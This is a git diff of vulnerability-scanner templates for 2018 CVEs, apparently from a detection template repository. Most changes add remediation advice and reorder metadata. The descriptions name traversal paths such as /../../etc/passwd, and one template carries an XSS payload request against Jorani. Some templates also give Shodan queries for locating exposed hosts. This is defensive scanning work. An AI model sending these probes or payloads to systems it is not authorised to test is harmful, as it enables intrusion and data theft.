cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* epss-percentile: 0.79507 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: vmware diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index cf16f3780f..9b03d71764 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -11,6 +11,8 @@ info: An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + remediation: | + Apply the latest security patches provided by the vendor to fix the deserialization vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - https://pivotal.io/security/cve-2018-1273 @@ -22,8 +24,8 @@ info: cve-id: CVE-2018-1273 cwe-id: CWE-94,CWE-20 epss-score: 0.97498 - cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* epss-percentile: 0.9996 + cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: pivotal_software diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index bbc8c61928..1df5e56b81 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + remediation: | + Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md - https://github.com/jokkedk/webgrind/issues/112 @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.82786 + cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: app="Webgrind" + max-request: 1 vendor: webgrind_project product: webgrind + fofa-query: app="Webgrind" tags: cve,cve2018,lfi,webgrind http: diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 8f2258a9d4..447f26b5d3 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability. reference: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.97052 - cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* epss-percentile: 0.99648 + cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 31b58ef8eb..6ad8f9c683 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -5,20 +5,20 @@ info: author: pikpikcu severity: high description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. + remediation: Upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-1335 - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html - remediation: Upgrade to Tika 1.18. classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 epss-score: 0.97218 - cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* epss-percentile: 0.99743 + cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 37557205a0..85a76a35fd 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). + remediation: | + Apply the necessary patches or updates provided by Fortinet to fix the vulnerability. reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 @@ -15,14 +17,14 @@ info: cve-id: CVE-2018-13379 cwe-id: CWE-22 epss-score: 0.97486 - cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* epss-percentile: 0.99951 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"/remote/login" "xxxxxxxx" + max-request: 1 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" tags: cve,cve2018,fortios,lfi,kev http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 219b1eb3e2..e4cdcbddbb 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -5,6 +5,8 @@ info: author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + remediation: | + Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html - https://fortiguard.com/advisory/FG-IR-18-383 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* epss-percentile: 0.45743 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 261d2ad26d..b6835c8640 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: medium description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + remediation: | + Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/45016 - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* epss-percentile: 0.5447 + cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeta-producer diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index c28957583e..210ceed65d 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients. + remediation: | + Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability. reference: - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.00512 - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* epss-percentile: 0.73663 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 8b65835d54..2acb596261 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.28372 - cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* epss-percentile: 0.96243 + cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 vendor: velotismart_project diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 26f9b3ef3a..63e99199dd 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability. reference: - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa - https://seclists.org/fulldisclosure/2019/Jan/32 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* epss-percentile: 0.28011 + cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: goodoldweb diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 381ffabd92..704253a006 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of Django or apply the relevant patch provided by the Django project. reference: - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ - https://usn.ubuntu.com/3726-1/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-14574 cwe-id: CWE-601 epss-score: 0.01218 - cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* epss-percentile: 0.83586 + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index b773921bb5..18e6612bb3 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. + remediation: | + Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. reference: - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/45103/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-14728 cwe-id: CWE-918 epss-score: 0.96926 - cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* epss-percentile: 0.99601 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tecrail diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 8e756dbc09..4f0d006d13 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. + remediation: | + Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.97246 - cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* epss-percentile: 0.99761 + cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cgit_project diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 38c34817a5..e759bdd5eb 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. + remediation: | + Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.72875 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: loytec diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index aba7875ad8..9d564a9950 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + remediation: | + Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: - https://seclists.org/fulldisclosure/2019/Apr/12 - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.4378 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.96878 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"LGATE-902" verified: true + max-request: 1 vendor: loytec product: lgate-902_firmware + shodan-query: http.html:"LGATE-902" tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate http: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 2808fb78ec..ef5ed3aff6 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + remediation: | + Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability. reference: - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14931 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: polarisft diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index cf9de2c15d..cda46e7922 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080070 - https://www.exploit-db.com/exploits/45167/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.34955 - cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* epss-percentile: 0.96565 + cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ericssonlg diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 408ab6690b..6adc88d65d 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + remediation: | + Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* epss-percentile: 0.84824 + cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 2264a27770..8092a8a652 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + remediation: | + Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/45271 - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.97149 - cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* epss-percentile: 0.99695 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tecrail diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index b39ec0cb38..b738c9d90d 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + remediation: | + Upgrade to a patched version of Argus Surveillance DVR. reference: - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-15745 cwe-id: CWE-22 epss-score: 0.9654 - cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* epss-percentile: 0.99425 + cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: argussurveillance diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 0cee8304d1..92e6aeeef7 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45338 - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Login - Jorani" tags: cve,cve2018,jorani,xss @@ -25,12 +27,12 @@ http: - | GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 Host: {{Hostname}} - - | GET /session/login HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 13eae1f356..b82515d5bc 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -5,6 +5,8 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + remediation: | + Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-15961 cwe-id: CWE-434 epss-score: 0.97453 - cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* epss-percentile: 0.99925 + cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index bf947f6d07..c6f6b581f8 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0. reference: - https://www.exploit-db.com/exploits/45342 - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-16059 cwe-id: CWE-22 epss-score: 0.60231 - cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* epss-percentile: 0.97328 + cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 vendor: endress diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 8cc1f06d94..ed4212df54 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. reference: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16133 cwe-id: CWE-22 epss-score: 0.11636 - cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* epss-percentile: 0.94538 + cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybrotech diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 593552d8be..1dafd59203 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + remediation: | + Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html - https://nvd.nist.gov/vuln/detail/CVE-2018-16139 @@ -15,14 +17,14 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Bibliopac" verified: true + max-request: 1 vendor: bibliosoft product: bibliopac + shodan-query: title:"Bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft http: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index e338ebb0d4..0d300d243b 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 - https://wordpress.org/plugins/gift-voucher/ - https://www.exploit-db.com/exploits/45255/ - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 - https://wpvulndb.com/vulnerabilities/9117 - remediation: Fixed in version 4.1.8. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83832 + cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: codemenschen product: gift_vouchers + framework: wordpress tags: 